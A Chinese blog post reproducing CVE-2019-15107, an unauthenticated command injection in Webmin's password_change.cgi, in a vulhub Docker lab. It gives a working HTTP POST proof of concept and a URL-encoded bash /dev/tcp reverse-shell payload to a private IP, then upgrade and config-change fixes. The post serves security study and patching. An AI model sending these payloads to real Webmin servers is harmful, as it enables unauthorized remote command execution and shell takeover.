首页 > 其他分享 >Webmin 远程命令执行 (CVE-2019-15107)

Webmin 远程命令执行 (CVE-2019-15107)

时间:2023-10-12 22:35:22浏览次数:49  
标签:cgi 10000 Webmin 漏洞 2019 15107 CVE

说明 内容
漏洞编号 CVE-2019-15107
漏洞名称 Webmin 远程命令执行
漏洞评级
影响范围 Webmin<=1.920
漏洞描述 该漏洞由于password_change.cgi文件在重置密码功能在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。
修复方案

1.1、漏洞描述

Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。

该漏洞由于password_change.cgi文件在重置密码功能在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。

1.2、漏洞等级

1.3、影响版本

Webmin<=1.920

1.4、漏洞复现

1、基础环境

Path:vulhub/webmin/CVE-2019-15107


启动测试环境:

sudo docker-compose up -d

访问https://your-ip:10000/即可看到

image-20231012170906031

2、漏洞验证

直接访问https://your-ip:10000/password_change.cgi

image-20231012171030426

抓包后修改如下POC即可

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|ls&new1=test2&new2=test2

上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。

image-20231012171103480

命令执行成功

也可以使用HackBar插件执行

image-20231012191124242

1.5、深度利用

1、反弹Shell

bash -c "bash -i >& /dev/tcp/192.168.8.8/6868 0>&1"

进行url编码

image-20231012171217704

Kali监听6868端口,BurpSuite发送数据包,进行反弹

POST /password_change.cgi HTTP/1.1
Host: 192.168.8.8:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.8.8:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

user=rootxx&pam=&expired=2&old=test|bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.8%2F6868%200%3E%261%22&new1=test2&new2=test2

反弹成功!

image-20231012171315658

1.6、修复建议

目前Webmin官方已发布最新版 修复了该漏洞,请受影响的用户尽快升级至最新版本:

下载链接:http://webmin.com/download.html

临时解决方案:

1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。

1.7、参考链接

标签:cgi,10000,Webmin,漏洞,2019,15107,CVE
From: https://www.cnblogs.com/saury/p/17760758.html

相关文章

  • C++ - VS2019配置pthread线程库
    1.说明在VS里用MS编译器不能直接调用pthread库,需要先自行下载该库:http://sourceware.org/pub/pthreads-win32/pthreads-w32-2-9-1-release.zip解压后用的到的只有Pre-built.2文件夹下的文件。 2.配置如下图分别配置三大项:包含目录-->...pthreads-w32-2-9-1-release\Pre-......
  • Visual Studio 2019设置类和接口注释
     一、找到Visual Studio 2019安装目录D:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\ItemTemplates\CSharp\Code\2052 二、修改类模板文件 #region<<版本注释>>/*----------------------------------------------------......
  • [GWCTF 2019]我有一个数据库
    原理phpmyadmin4.8.1漏洞php对目录不存在不敏感解题过程进入靶场,看到乱码的页面--,原代码也没啥提示,只能扫目录看看了最终扫到了phpmyadmin,进入可以看到版本信息上网搜漏洞进行复现即可....这个漏洞之前做过,就是切割问号然后目录穿越参考文章:https://blog.csdn.net/m0_55......
  • Visual Studio 2019 快速定位代码的位置
              ......
  • [GXYCTF2019]禁止套娃
    原理.git泄露,githack获取源码无参RCE执行解题过程进入靶场,每看到有用的信息,那就只能目录扫描了,扫到了.git目录,就用githack获取源码<?phpinclude"flag.php";echo"flag在哪里呢?<br>";if(isset($_GET['exp'])){if(!preg_match('/data:\/\/|filter:\/\/|php:\/......
  • [极客大挑战 2019]HardSQL
    原理用fuzz字典来爆破哪些关键字被过滤了sql语句可以不用空格,仅用括号来隔开username=1'or(updatexml(1,concat(0x7e,database()),1))%23url编码一些值:%20空格%23#。。。and关键字可以用^来代替,=可以用like来代替。有时候不写空格也挺方便的,直接省略过滤空格的可能性截取字......
  • [ZJCTF 2019]NiZhuanSiWei
    原理反序列话伪协议data和filter解题过程进入靶场看到源码<?php$text=$_GET["text"];$file=$_GET["file"];$password=$_GET["password"];if(isset($text)&&(file_get_contents($text,'r')==="welcometothezjctf"......
  • [极客大挑战 2019]BuyFlag
    原理弱比较问题科学计数法绕过cookie字段的修改解题过程进入靶场,页面没什么提示,就先看下原代码吧看到有两个超链接,现在这个页面是index.php,看一下flag.php有这几个提示,要满足两个条件咯,再看下原代码发现有后端源码,也就是说要传入password和money,这里的源码需要password......
  • 记一次Smanga SQL注入漏洞挖掘(CVE-2023-36076)
    记录一次本人CVE漏洞挖掘的过程,此漏洞已被分配编号:CVE-2023-36076引言水一篇文章,本文介绍了一次对某开源项目基于时间盲注的SQL注入漏洞的挖掘,此开源项目是一个流媒体管理平台,注入点为/php/history/add.php接口中的mediaId参数,指纹信息显示数据库采用Mysql。漏洞挖掘正常......
  • 记一次Smanga 身份验证绕过漏洞挖掘(CVE-2023-36079)
    记录一次本人CVE漏洞挖掘的过程,此漏洞已被分配编号:CVE-2023-36079引言本文介绍了一次针对某开源项目的身份验证绕过漏洞,此开源项目是一个流媒体管理平台。代码审计审计代码发现功能接口点使用check_user_power()函数进行权限校验。跟踪该函数,发现没有使用常规的JWT或者自......